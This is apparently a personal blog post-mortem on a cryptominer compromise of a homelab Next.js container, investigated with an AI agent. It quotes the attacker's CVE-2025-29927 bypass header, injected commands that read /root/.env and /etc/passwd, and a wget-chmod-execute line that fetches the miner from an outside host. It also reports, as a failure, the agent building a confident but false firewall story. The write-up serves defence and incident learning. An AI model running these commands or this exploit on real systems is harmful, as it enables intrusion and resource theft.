The Fan Was the SIEM - How I Found a Cryptominer in My Homelab
The Fan Was the SIEM
There’s a particular pitch a server fan hits when something on it is really unhappy. Not the steady whoosh of a transcoding job, not the ramp-up of a kernel build. A higher, sustained whine that says: eight cores, full tilt, and I am not consenting to this.
I walking upstairs to my bedroom on a Wednesday evening when cyberpunk — the workhorse box in my homelab — started singing that note. I hadn’t kicked off anything heavy. So using Telegram Voice I asked Hermes, my agent, to investigate.
What it found was a cryptominer that had been running for nineteen minutes.
This is the story of how it got in, how I caught it, and how a CTO and an AI agent worked an incident together at 11pm on a school night.
The discovery
The conversation started about as informally as security incidents ever begin:
“What’s cyberpunk doing? The CPU fan’s loud.”
Hermes peeked at the host through the Docker socket proxy and came back with a single damning line: load average 9.5, and a container called prism was eating 821% CPU. Prism was a demo Next.js app I’d stood up weeks earlier and forgotten about. It had no business doing anything, let alone melting eight cores.
A cat /proc/<pid>/cmdline later, the picture sharpened:
./npm_update -B -o 31.220.80.26:7777 \
-u 46RS6nKCGwRhndfpksLJomXuo4dZ7N9Afj3P1vHZxnwoQhHLw4yEzcocy1XseBdAvvb3Avx2o5PDKND8hdcRumi63ix8Ers \
-p prism
Three things tell you exactly what this is:
- The
-oflag pointing at a TCP pool on port 7777 - A 95-character Monero wallet address
- The worker label
-p prism— the attacker tagging the victim by name so they know which compromised box is paying which fraction of the rent
The binary was named npm_update, presumably because it sits visually adjacent to node, npm, and pm2 in a process list. Cute. Not enough.
This was XMRig, daemonised (-B), pointed at a German VPS at Hostpalace.
The entry vector
Once you know what is running, the next question is how. Hermes walked the container logs backward from the miner’s start time and the timeline assembled itself in about three minutes of investigation:
16:24 UTC — generic recon. /.git/config, /.env, /admin, /api/users. The kind of scan every public-facing app sees a hundred times a day.
Then this header showed up:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
That is the signature of CVE-2025-29927, a Next.js middleware authorisation bypass disclosed earlier in 2025. If your middleware is the only thing standing between an attacker and your authenticated API routes, that header walks straight past it. Prism was running Next.js 14.2.16. The fix shipped in 14.2.25 and 15.2.3. I had not patched.
The attacker pivoted to admin endpoints. /api/credentials and /api/secrets both returned 200 OK. Whatever was in there got read.
Then RCE. The container logs started showing Node.js errors of this shape:
Command failed: test -f /root/.env && cat /root/.env
Command failed: ls -la /etc/passwd && cat /etc/passwd
Those errors come from child_process.exec(). Somewhere in Prism’s admin API was a route that took user input and shoved it into a shell — classic command injection, chained off the middleware bypass.
The miner drop:
sh -c "cd /tmp && wget 31.220.80.26:8000/x86_64 -O npm_update \
&& chmod +x npm_update \
&& ./npm_update -B -o 31.220.80.26:7777 -u 46RS6n... -p prism"
The same VPS that hosted the mining pool also served the binary on port 8000. Lazy, but effective.
Containment
Here is the part of the story I’m proud of, and it has nothing to do with detection.
When I built the Prism stack, I did the boring things. The container ran unprivileged. No bind mounts. No Docker socket exposed. An isolated bridge network. No real secrets in its environment. None of those decisions were heroic — they’re table stakes — but they meant the blast radius of this compromise was exactly the Prism container and nothing else.
Hermes verified each one. It checked every other container on cyberpunk for outbound connections to 31.220.80.26 — none. It checked the other four hosts in the fleet — clean. It looked for a second-stage payload, persistence, lateral movement attempts. Nothing.
The attacker had landed in a sealed room.
docker stop prism
Nineteen minutes of mining ended. I left the container stopped rather than removed, so the writable layer froze in place for forensics. Hermes copied the binary out to /tmp/prism-evidence/, captured the SHA256 (b6d2cf8b3a16ab35e0c3cc1ab32afd6faf3f0adfe48a52b51ee3ce2f8c2bb70), saved the cmdline, dumped the container logs.
Then I went to bed.
The red herring
Worth telling, because it’s the most honest part of working with an agent.
Earlier the same evening — before the miner — I’d been unable to SSH into cyberpunk from my WireGuard IP. When the miner story broke, my first instinct was: the attacker pivoted, and now I’m locked out. Hermes built a confident story to match. CrowdSec had banned my IP, the firewall counter showed 794k drops, ssh-bf alert, etc.
It was wrong. All of it.
The actual cause was a UFW regression from a ufw-docker rollout I’d done four days earlier. The 192.168.3.0/24 allow rule for port 22 had been quietly dropped on two of five hosts. CrowdSec was busy banning real internet attackers — that 794k counter was Russian and Chinese SSH brute-forcers, not me.
When I pushed back, Hermes ran the verification commands that should’ve come first:
cscli alerts list --ip 192.168.3.4 -a -o json # empty
cscli decisions list -a | grep 192.168.3.4 # empty
Empty. Confident narrative, dead. We fixed the UFW rule on the two missing hosts, audited the other three, and Hermes patched the managing-brents-fleet skill with a new lesson: verify the actual drop point before naming a firewall culprit.
I tell that part because it’s instructive. Agents will gladly weave plausible stories from circumstantial evidence. The fix is the same as it is for human engineers: push back, demand verification, prefer one tool call over a clever theory.
What I’d do differently
The unflattering list:
- A demo app sitting behind a Pangolin reverse proxy on the public internet, unpatched, with admin routes that took shell input. Each of those choices was fine in isolation. Stacked, they were a self-assembling exploit kit.
- No CPU-spike alerting. I detected this with my ears. That’s a fun anecdote but a terrible runbook. A 5-minute load > N alert into Telegram would have caught it before it caught me.
- No egress restrictions to known mining pool ranges on the host or the Pangolin VPS. Cheap, effective, would have made the miner unable to phone home.
- No Falco / auditd rules for the
wget → chmod +x → execdrop pattern in/tmp. That sequence is essentially a signature for this entire genre of attack.
What worked
- Container isolation. Boring, deeply unsexy, completely decisive.
- Evidence preservation by default. Stop, don’t remove. Future me will thank present me when the SHA256 lookup is useful.
- Working with the agent like a colleague. Not “Hermes, fix it.” More: “Pull this, verify that, show me the cmdline, prove the lateral movement claim.” Treat the agent as a fast pair of hands attached to a confident-but-fallible mouth, and you get good work out of it. Treat it as an oracle and you’ll cosign its hallucinations.
- Pushing back when something didn’t fit. The CrowdSec story was internally consistent and externally false. Two minutes of skepticism was worth more than twenty minutes of investigation built on a wrong premise.
The miner ran for nineteen minutes. The investigation took about ninety. The lesson was free, which is the only kind of security lesson worth celebrating: nothing important got owned, no real credentials leaked, and the only thing the attacker successfully extracted was a few cents of Monero and one good blog post.
I’ll take the trade.